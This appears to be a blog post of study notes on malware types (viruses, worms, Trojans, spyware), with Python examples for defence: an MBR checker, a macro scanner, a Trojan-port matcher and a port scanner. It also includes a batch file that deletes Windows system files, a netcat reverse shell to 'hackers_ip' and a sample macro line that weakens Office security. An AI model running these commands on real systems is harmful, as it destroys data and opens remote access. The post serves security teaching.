NILADIC, Thursday 16 Shahrivar 1396 (7 September 2017), 12:07 PM
In this chapter we will talk a little about malware and the main types of malware.

What is MALWARE?
Malicious software: software written to perform malicious or disruptive actions on a system without the owner's consent.
Software in this class can infect, disrupt, disable and in some cases corrupt other software, including the operating system, and steal information.

*** Malware types:
    - Viruses
    - Worms
    - Trojan horses
    - Rootkits
    - Spyware
    - Adware
# Viruses:
self-replicating code that attaches itself to other executable programs and spreads when they run
    - what can a virus do?
    ¦ Alter data
    ¦ Infect other programs
    ¦ Replicate
    ¦ Encrypt itself
    ¦ Transform itself into another form
    ¦ Alter configuration settings
    ¦ Destroy data
    ¦ Corrupt or destroy hardware (for example by overwriting firmware)

* some historical viruses:
- Wabbit (1974): replicated itself over and over until the system ran out of resources and crashed (a fork bomb rather than a true file infector)
- Jerusalem (1987): an early logic bomb; it stayed dormant and only caused damage on a certain date (Friday the 13th)
- polymorphic viruses (first seen in 1992): change their encrypted body and decryptor on every infection, so the signature scanners of the time could not detect them
- metamorphic viruses: completely rewrite their own code on each infection, so no two copies share the same instructions

* kinds of viruses:
- system boot sector viruses:
infect the MBR (master boot record) of a disk and place their own code there, so the virus code runs before the operating system itself loads
    -- symptoms:
    startup problems, problems retrieving data, unstable performance, and the inability to locate hard drives
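Because the virus has to live in the 446 bytes of boot code in front of the partition table, the practical check is to compare the boot code of sector 0 against a hash taken when the system was known to be clean. The script below is an added example (not from the course or the page): it parses a 512-byte MBR, validates the 0x55AA signature and partition entries, and reports when the boot code no longer matches a baseline. The sample sectors are constructed inline; the boot code bytes are placeholders, not real loader code.

```python
import hashlib
import struct
from typing import Dict, List

MBR_SIZE = 512
BOOT_CODE_SIZE = 446          # bytes 0..445: boot code (what a boot-sector virus overwrites)
PARTITION_TABLE_OFFSET = 446  # 4 entries of 16 bytes each
BOOT_SIGNATURE = b"\x55\xaa"  # bytes 510..511
ENTRY_FMT = "<B3sB3sII"       # status, CHS start, type, CHS end, LBA start, sector count


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed sample MBR (not a real disk image): the given boot code,
    one bootable NTFS (type 0x07) partition at LBA 2048, valid signature."""
    boot_code = boot_code.ljust(BOOT_CODE_SIZE, b"\x00")[:BOOT_CODE_SIZE]
    entry = struct.pack(ENTRY_FMT, 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 204800)
    table = entry + b"\x00" * 48   # remaining three entries empty
    return boot_code + table + BOOT_SIGNATURE


def parse_mbr(data: bytes) -> Dict:
    """Split a raw 512-byte sector into boot-code hash, partition entries and signature check."""
    if len(data) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    partitions = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * i
        status, _, ptype, _, lba, sectors = struct.unpack(ENTRY_FMT, data[off:off + 16])
        if ptype == 0:
            continue  # empty entry
        partitions.append({"index": i, "bootable": status == 0x80,
                           "type": ptype, "lba_start": lba, "sectors": sectors})
    return {"boot_code_sha256": hashlib.sha256(data[:BOOT_CODE_SIZE]).hexdigest(),
            "partitions": partitions,
            "signature_ok": data[510:512] == BOOT_SIGNATURE}


def check_mbr(data: bytes, baseline_boot_code_sha256: str) -> List[str]:
    """Return a list of findings; an empty list means the sector matches the baseline."""
    findings = []
    info = parse_mbr(data)
    if not info["signature_ok"]:
        findings.append("missing 0x55AA boot signature")
    if info["boot_code_sha256"] != baseline_boot_code_sha256:
        findings.append("boot code differs from baseline")
    bootable = [p for p in info["partitions"] if p["bootable"]]
    if len(bootable) != 1:
        findings.append(f"{len(bootable)} bootable partitions (expected 1)")
    for p in info["partitions"]:
        if p["lba_start"] < 1:
            findings.append(f"partition {p['index']} starts at LBA 0 (overlaps the MBR)")
    return findings


# Constructed boot code: a JMP over a "loader" blob; the infected variant has had
# the loader bytes replaced, which is what a boot-sector virus does to run first.
CLEAN_BOOT_CODE = b"\xeb\x3c\x90" + b"clean loader".ljust(0x3c, b"\x00") + b"\xfa\x33\xc0"
INFECTED_BOOT_CODE = b"\xeb\x3c\x90" + b"virus hook!!".ljust(0x3c, b"\x00") + b"\xfa\x33\xc0"


if __name__ == "__main__":
    clean = build_sample_mbr(CLEAN_BOOT_CODE)
    baseline = parse_mbr(clean)["boot_code_sha256"]   # record once, on a known-good system
    print("clean   :", check_mbr(clean, baseline))
    print("infected:", check_mbr(build_sample_mbr(INFECTED_BOOT_CODE), baseline))
```

On a real machine the sector comes from `open(r"\\.\PhysicalDrive0", "rb").read(512)` on Windows (administrator required) or `/dev/sda` on Linux; the baseline hash must be stored off the disk being checked, otherwise the virus can update it too.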
- macro viruses:
apps like Excel and Word have macros (VBA) that are designed to automate tasks and create new processes;
macros are easy to abuse because they run with the full privileges of the user who opened the document
    -- problems:
    once a macro runs it can do all sorts of things, such as change a system configuration to decrease security
    or read the user's address book and e-mail itself to the contacts
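The two behaviours just described (auto-run on open, mail itself via the address book, weaken security settings) are visible in the macro source. The scanner below is an added example, not from the course: it takes VBA text that has already been extracted from a document (the oletools `olevba` utility does that step) and flags auto-exec entry points and capability indicators. Both macro samples are constructed for the demo; the indicator list is a deliberately small illustration, not a complete rule set.

```python
import re
from typing import Dict

# Constructed sample of VBA source as it would be extracted from a .docm/.xlsm
# (not taken from a real sample); it shows the address-book mailer pattern.
SUSPICIOUS_MACRO = r'''
Sub AutoOpen()
    Dim ol As Object
    Set ol = CreateObject("Outlook.Application")
    For Each entry In ol.Session.AddressLists(1).AddressEntries
        Set m = ol.CreateItem(0)
        m.To = entry.Address
        m.Attachments.Add ActiveDocument.FullName
        m.Send
    Next
    Shell "cmd /c reg add HKCU\Software\Microsoft\Office\16.0\Word\Security /v VBAWarnings /t REG_DWORD /d 1 /f", vbHide
End Sub
'''

BENIGN_MACRO = r'''
Sub FormatReport()
    Selection.Font.Bold = True
    ActiveSheet.Range("A1").Value = "Total"
End Sub
'''

# Procedures that Office runs automatically when a document is opened or closed.
AUTO_EXEC = re.compile(
    r"\b(Sub|Function)\s+(AutoOpen|AutoExec|AutoClose|AutoExit|Document_Open|"
    r"Document_Close|Workbook_Open|Workbook_Close|Auto_Open)\b", re.I)

# Capabilities worth flagging; each value is a regex over the macro source text.
INDICATORS = {
    "executes external program": r"\bShell\b|\bWScript\.Shell\b|\bCreateProcess\b",
    "creates COM objects": r"\bCreateObject\s*\(|\bGetObject\s*\(",
    "uses Outlook / address book": r"Outlook\.Application|AddressLists|AddressEntries|\.Send\b",
    "changes security settings": r"VBAWarnings|AccessVBOM|DisableAttachmentsInPV|reg\s+add\b",
    "writes or deletes files": r"\bKill\b|\bOpen\b.+\bFor\s+(Output|Binary)|\bFileCopy\b",
    "downloads content": r"URLDownloadToFile|XMLHTTP|WinHttp|\bhttps?://",
    "hides execution": r"\bvbHide\b|Application\.Visible\s*=\s*False",
}


def scan_vba(source: str) -> Dict:
    """Return auto-exec entry points, matched capability indicators and a crude score."""
    triggers = sorted({m.group(2) for m in AUTO_EXEC.finditer(source)})
    hits = sorted(name for name, pat in INDICATORS.items() if re.search(pat, source, re.I))
    # A macro that starts by itself AND has dangerous capabilities is the worrying case,
    # so the combination gets a bonus on top of one point per indicator.
    score = len(hits) + (3 if triggers and hits else 0)
    return {"auto_exec": triggers, "indicators": hits, "score": score}


def is_suspicious(source: str, threshold: int = 4) -> bool:
    return scan_vba(source)["score"] >= threshold


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_MACRO), ("benign", BENIGN_MACRO)):
        print(label, scan_vba(src))
```

The threshold is arbitrary; what matters is the shape of the decision: a macro with an auto-exec trigger plus program execution or mail capability deserves a look regardless of what the document claims to be.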

- cluster viruses:
this virus alters the file allocation table on a storage device so that program entries point at the virus code; when a user runs a given application
the virus runs first and then hands control to the actual file
### NOTE: disk repair utilities are not useful against this type: they see the FAT as cross-linked and "repairing" it can destroy sections of the drive

- encryption viruses:
they avoid detection by never storing their body in the clear.
The virus body is encrypted and only a small decryptor stub stays in plain code; each time the
infection process occurs a new key (and often a different setting of the encryption routine) is used,
so every copy looks different on disk and a fixed byte signature for the body cannot match.
What stays constant, and what antivirus software ends up keying on, is the decryptor stub itself
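To make the point concrete, here is an added example (not code from the course): a stand-in "virus body" is XOR-encrypted under a fresh key for every generation, a naive byte-signature scanner is run over the result, and the body is recovered the way the stub would at run time. The stub bytes and the body text are constructed placeholders, not machine code; the value of the demo is that the body signature never matches while the constant stub always does.

```python
import secrets
from typing import Optional

KEY_LEN = 16
# Constant decryptor stub: a marker standing in for the small plain-code routine that a real
# encrypted virus keeps in the clear to decrypt its body (constructed, not real machine code).
DECRYPTOR_STUB = b"\xeb\x10" + b"[xor-decrypt-stub]"
# Constructed stand-in for the virus body; the scanner's "signature" is its first 16 bytes.
BODY = b"VIRUS_BODY: find *.doc files, append self, rewrite config, mail copies"
BODY_SIGNATURE = BODY[:16]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def generate_infection(body: bytes, key: Optional[bytes] = None) -> bytes:
    """Produce one 'generation': stub + per-copy key + encrypted body.
    Each call with a fresh key yields a different byte sequence for the same body."""
    key = key if key is not None else secrets.token_bytes(KEY_LEN)
    if len(key) != KEY_LEN:
        raise ValueError("key must be %d bytes" % KEY_LEN)
    return DECRYPTOR_STUB + key + xor_bytes(body, key)


def recover_body(sample: bytes) -> bytes:
    """What the stub does at run time (and what an analyst does statically): read the key, decrypt."""
    if not sample.startswith(DECRYPTOR_STUB):
        raise ValueError("no decryptor stub at start of sample")
    start = len(DECRYPTOR_STUB)
    key = sample[start:start + KEY_LEN]
    return xor_bytes(sample[start + KEY_LEN:], key)


def signature_scan(sample: bytes, signature: bytes) -> bool:
    """Naive byte-signature scanner, as used before emulation and heuristics were common."""
    return signature in sample


if __name__ == "__main__":
    gen1, gen2 = generate_infection(BODY), generate_infection(BODY)
    print("two generations identical?", gen1 == gen2)                          # False
    print("body signature found?     ", signature_scan(gen1, BODY_SIGNATURE))  # False
    print("decryptor stub found?     ", signature_scan(gen1, DECRYPTOR_STUB))  # True
    print("body recovered?           ", recover_body(gen1) == BODY)            # True
```

This is why polymorphic engines went one step further and mutated the decryptor too; against that, scanners had to emulate the stub until the body appeared in memory and scan the decrypted result.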

-- stealth viruses:
hide from detection by intercepting system calls (file reads, directory listings) and returning the clean, uninfected view of the host
-- file-overwriting (cavity) viruses:
like stealth viruses they hide in a host file, but they write themselves into unused space inside the file so the host file's size does not change

-- sparse-infector viruses:
avoid detection by carrying out their infectious actions only
occasionally, such as on every 10th or 25th activation

-- companion viruses:
exploit a feature of DOS/Windows command resolution: when two programs share the same base name but have different extensions,
the shell runs them in a fixed order of precedence (.com before .exe), so a virus dropped as app.com runs instead of app.exe
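The same precedence rule gives the defender a cheap check: any directory on PATH where a .com shares its base name with an .exe deserves attention. The script below is an added example (not part of the course) that models cmd.exe's resolution order using the leading entries of the default PATHEXT and reports such collisions; the directory listing is constructed for the demo.

```python
import os
from pathlib import Path
from typing import List, Optional, Tuple

# Default precedence cmd.exe uses when "app" is typed without an extension
# (the first entries of the default PATHEXT); .COM wins over .EXE.
PATHEXT = [".COM", ".EXE", ".BAT", ".CMD"]


def resolve_command(name: str, files: List[str]) -> Optional[str]:
    """Return the file cmd.exe would run for `name` given the directory listing `files`."""
    by_lower = {f.lower(): f for f in files}
    for ext in PATHEXT:
        candidate = (name + ext).lower()
        if candidate in by_lower:
            return by_lower[candidate]
    return None


def find_companions(files: List[str]) -> List[Tuple[str, str]]:
    """Pairs (shadowing file, shadowed file) where a higher-precedence extension
    shares its base name with a lower-precedence executable."""
    groups = {}
    for f in files:
        stem, ext = os.path.splitext(f)
        if ext.upper() in PATHEXT:
            groups.setdefault(stem.lower(), {})[ext.upper()] = f
    findings = []
    for stem, exts in groups.items():
        present = [e for e in PATHEXT if e in exts]
        if len(present) > 1:
            winner = exts[present[0]]
            for loser in present[1:]:
                findings.append((winner, exts[loser]))
    return findings


def scan_directory(path: str) -> List[Tuple[str, str]]:
    """Run find_companions over the real files in one directory (e.g. one PATH entry)."""
    return find_companions([p.name for p in Path(path).iterdir() if p.is_file()])


# Constructed directory listing: NOTEPAD.COM has been dropped next to notepad.exe.
SAMPLE_LISTING = ["notepad.exe", "NOTEPAD.COM", "calc.exe", "setup.bat", "readme.txt"]

if __name__ == "__main__":
    print("notepad ->", resolve_command("notepad", SAMPLE_LISTING))   # NOTEPAD.COM
    print("calc    ->", resolve_command("calc", SAMPLE_LISTING))      # calc.exe
    print("companions:", find_companions(SAMPLE_LISTING))            # [('NOTEPAD.COM', 'notepad.exe')]
```

To sweep a live system, call `scan_directory` on each entry of `os.environ["PATH"].split(os.pathsep)`; a .com next to a well-known .exe in System32 is almost never legitimate.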

-- logic bomb:
logic bombs are notoriously difficult to detect because they
look harmless until their trigger condition (a date, an event, a counter) is met

-- multipartite viruses: infect in more than one way at once, typically both the boot sector and executable files
-- shell viruses: wrap around the host program like a shell, so the virus code runs first and then passes control to the original program's subroutines
-- crypto viruses (ransomware):
hunt for files or certain types of data on a system and then encrypt them;
to unlock the data the victim has to contact the virus creator and pay for the key

***** Create Virus (the course's destructive example; do not run it):
a batch file that tries to wipe the Windows installation:
    @echo off
    del c:\windows\system32\*.*
    del c:\windows\*.*
save it as name.bat and convert it to a .com file: " use bat2com to convert name.bat into name.com "
(on a modern Windows the deletes mostly fail, since the files are in use or protected by TrustedInstaller ACLs, but the idea is the same)

or we can use JPS Virus Maker to generate simple viruses...

# Worm:

worms combine network access, self-contained malicious code and speed to spread very quickly and do a lot of damage

- worms common features:
¦ Do not require a host application to carry their code; they are stand-alone programs
¦ Do not necessarily require any user interaction, direct or otherwise, to spread
¦ Replicate extremely rapidly across networks and hosts
¦ Consume bandwidth and resources

# Spyware:
designed to collect information about a victim's activities and forward it to an interested party

- how spyware gets in:
    . peer-to-peer networks: many users exchanging files nobody has checked
    . instant messaging: easily used to share files and send malware
    . Internet Relay Chat
    . e-mail attachments
    . physical access
    . browser defects (bugs)
    . downloading freeware bundled with spyware
    . malicious or compromised websites
# Adware:
displays ads and pop-ups, and may even change the start page of the browser

# Scareware:
scares people with a fake warning about something on their system and makes them buy a utility to "clean" it, handing over their credit card details in the process ...

# Trojans:
a Trojan is a program that looks useful or harmless but is designed to provide covert access to
a victim's system

- signs that a Trojan may be present:
    ¦ The CD drawer of a computer opens and closes.
    ¦ The computer screen changes, either flipping or inverting.
    ¦ Screen settings change by themselves.
    ¦ Documents print with no explanation.
    ¦ The browser is redirected to a strange or unknown web page.
    ¦ The Windows color settings change.
    ¦ Screen saver settings change.
    ¦ The right and left mouse buttons reverse their functions.
    ¦ The mouse pointer disappears.
    ¦ The mouse pointer moves in unexplained ways.
    ¦ The Start button disappears.
    ¦ Chat boxes appear on the infected system.
    ¦ The Internet service provider (ISP) reports that the victim’s computer is running port scans.
    ¦ People chatting with you appear to know detailed personal information.
    ¦ The system shuts down by itself.
    ¦ The taskbar disappears.
    ¦ Account passwords are changed.
    ¦ Legitimate accounts are accessed without authorization.
    ¦ Unknown purchase statements appear in credit card bills.
    ¦ Modems dial and connect to the Internet by themselves.
    ¦ Ctrl+Alt+Del stops working.
    ¦ When the computer is rebooted, a message states that other users are still connected.
- what can a hacker do on the target?
    ¦ Stealing data
    ¦ Installing software
    ¦ Downloading or uploading files
    ¦ Modifying files
    ¦ Installing keyloggers
    ¦ Viewing the system user’s screen
    ¦ Consuming computer storage space
    ¦ Crashing the victim’s system
- mechanism:
Trojans use two channels, one OVERT and one COVERT
overt channel: the legitimate, visible communication (the program or protocol the Trojan hides inside)
covert channel: the hidden channel used to carry commands and stolen data (e.g. Loki tunnels over ICMP)

* types of Trojans:
    ¦ Remote access Trojans (RATs): designed to give an attacker remote control over a
    victim's system. Two well-known members of this class are SubSeven and Back Orifice
    ¦ Data sending: keyloggers are common Trojans of this type
    ¦ Destructive: this type of Trojan seeks to corrupt, erase, or destroy data outright on a system
    ¦ Proxy: malware of this type causes a system to be used as a proxy by the attacker
    ¦ FTP: designed to set up the infected system as an FTP server
    ¦ Security software disablers
 some of them listen on a well-known default port, so we can detect them by looking for that port
 (the list below mixes real Trojans with legitimate remote-administration tools such as VNC, pcAnywhere and Citrix ICA that attackers also abuse; a port match is a hint, not proof)
¦ Back Orifice: UDP 31337 or 31338
¦ Back Orifice 2000: TCP/UDP 54320/54321
¦ Beast: TCP 6666
¦ Citrix ICA: TCP/UDP 1494
¦ Deep Throat: UDP 2140 and 3150
¦ Desktop Control: UDP NA
¦ Donald Dick: TCP 23476/23477
¦ Loki: Internet Control Message Protocol (ICMP)
¦ NetBus: TCP 12345 and 12346
¦ Netcat: TCP/UDP (any)
¦ NetMeeting Remote: TCP 49608/49609
¦ pcAnywhere: TCP 5631/5632/65301
¦ Reachout: TCP 43188
¦ Remotely Anywhere: TCP 2000/2001
¦ Remote: TCP/UDP 135-139
¦ Whack-a-Mole: TCP 12361 and 12362
¦ NetBus 2 Pro: TCP 20034
¦ GirlFriend: TCP 21544
¦ Masters Paradise: TCP 3129, 40421, 40422, 40423, and 40426
¦ Timbuktu: TCP/UDP 407
¦ VNC: TCP/UDP 5800/5801

* how do we check?
NETSTAT, the built-in Windows tool:
netstat -an
(netstat -ano also shows the owning process ID, so a suspicious listener can be traced to its process)

or we can use a sniffer
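Reading the table against `netstat` output by eye does not scale, so here is an added example (not from the course) that parses Windows `netstat -ano` output and flags listening sockets whose port matches a Trojan default from the list above. Only the real Trojans are in the lookup table; the legitimate remote-admin tools are left out on purpose so they do not raise false alarms. The netstat text is constructed for the demo.

```python
import re
from typing import Dict, List

# Default ports from the Trojan table above (real Trojans only).
TROJAN_PORTS = {
    ("udp", 31337): "Back Orifice", ("udp", 31338): "Back Orifice",
    ("tcp", 54320): "Back Orifice 2000", ("tcp", 54321): "Back Orifice 2000",
    ("udp", 54320): "Back Orifice 2000", ("udp", 54321): "Back Orifice 2000",
    ("tcp", 6666): "Beast",
    ("udp", 2140): "Deep Throat", ("udp", 3150): "Deep Throat",
    ("tcp", 23476): "Donald Dick", ("tcp", 23477): "Donald Dick",
    ("tcp", 12345): "NetBus", ("tcp", 12346): "NetBus", ("tcp", 20034): "NetBus 2 Pro",
    ("tcp", 12361): "Whack-a-Mole", ("tcp", 12362): "Whack-a-Mole",
    ("tcp", 21544): "GirlFriend",
    ("tcp", 3129): "Masters Paradise", ("tcp", 40421): "Masters Paradise",
    ("tcp", 40422): "Masters Paradise", ("tcp", 40423): "Masters Paradise",
    ("tcp", 40426): "Masters Paradise",
}

# Constructed `netstat -ano` output in the Windows format, not a real capture.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING       3320
  TCP    192.168.1.10:49812     93.184.216.34:443      ESTABLISHED     5116
  TCP    [::]:135               [::]:0                 LISTENING       912
  UDP    0.0.0.0:31337          *:*                                    3320
  UDP    0.0.0.0:5353           *:*                                    1488
"""

# proto, local, foreign, optional state (UDP lines have none), optional PID
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+([A-Z_]+))?(?:\s+(\d+))?\s*$")


def split_addr(addr: str):
    """'0.0.0.0:135' -> ('0.0.0.0', 135); '[::]:135' -> ('::', 135)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port)


def parse_netstat(text: str) -> List[Dict]:
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # banner, header or blank line
        proto, local, _remote, state, pid = m.groups()
        host, port = split_addr(local)
        records.append({"proto": proto.lower(), "local_ip": host, "local_port": port,
                        "state": state or "", "pid": int(pid) if pid else None})
    return records


def find_trojan_ports(records: List[Dict]) -> List[Dict]:
    """Flag listening TCP sockets and bound UDP sockets whose port is a known Trojan default."""
    hits = []
    for r in records:
        listening = r["proto"] == "udp" or r["state"] == "LISTENING"
        name = TROJAN_PORTS.get((r["proto"], r["local_port"]))
        if listening and name:
            hits.append({"name": name, "proto": r["proto"], "port": r["local_port"], "pid": r["pid"]})
    return hits


if __name__ == "__main__":
    for h in find_trojan_ports(parse_netstat(SAMPLE_NETSTAT)):
        print(h)
```

On a live host feed it `subprocess.run(["netstat", "-ano"], capture_output=True, text=True).stdout`, then look the flagged PID up with `tasklist /fi "PID eq 3320"`. A port match on its own proves nothing; a modern RAT picks whatever port it likes, so the stronger signal is an unknown process holding any listener at all.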

***** BACK DOOR (reverse shell with netcat):

nc -n -v -l -p 80   /// on the attacker's system: listen on port 80
nc -n hackers_ip 80 -e "cmd.exe"   /// on the victim's system: connect back to the attacker and hand over cmd.exe
(the -e option exists in the original and Windows nc builds and in ncat; the OpenBSD netcat shipped with many Linux distributions does not have it)

/// nc port scan:
    nc -v -z -w1 IPaddress <start port>-<ending port>
    nc -l -p [port] ///// simple listener on a TCP port .... with -u it listens on a UDP port instead

nc -d  /// detach nc from the console (Windows build)
nc -e [program] /// run the program and redirect its stdin/stdout to the connection
program | nc   //// send program output over nc
nc | program //// feed nc output to a program
nc -z   ////// zero-I/O mode, used for port scanning (connect, report, send nothing)
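What `nc -z -w1` actually does is a TCP connect scan: complete the handshake, send nothing, close, and treat a timeout or refusal as "closed". The following added example (not from the course) reimplements that in Python with a per-port timeout and a thread pool, and starts a throwaway loopback listener so it can be tried offline without scanning anyone.

```python
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import List, Tuple


def port_is_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Equivalent of `nc -z -w1 host port`: complete a TCP handshake, send nothing, close.
    Refused connections and timeouts (both OSError subclasses) count as closed/filtered."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan_ports(host: str, start: int, end: int, timeout: float = 1.0, workers: int = 64) -> List[int]:
    """Equivalent of `nc -v -z -w1 host start-end`; returns the open ports in ascending order.
    Ports are probed in parallel so a 1 s timeout on closed ports does not make the scan crawl."""
    ports = range(start, end + 1)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, port_is_open(host, p, timeout)), ports))
    return [p for p, is_open in results if is_open]


def start_test_listener(host: str = "127.0.0.1") -> Tuple[socket.socket, int]:
    """Bind a throwaway listener on an ephemeral port so the scan can be tried offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    srv, port = start_test_listener()
    try:
        print("listener on", port, "-> open ports:", scan_ports("127.0.0.1", port, port))
    finally:
        srv.close()
    print("after close -> open ports:", scan_ports("127.0.0.1", port, port))
```

A completed handshake is what the target logs, so this is as noisy as netcat; the point of the example is the semantics of `-z` and `-w`, not stealth.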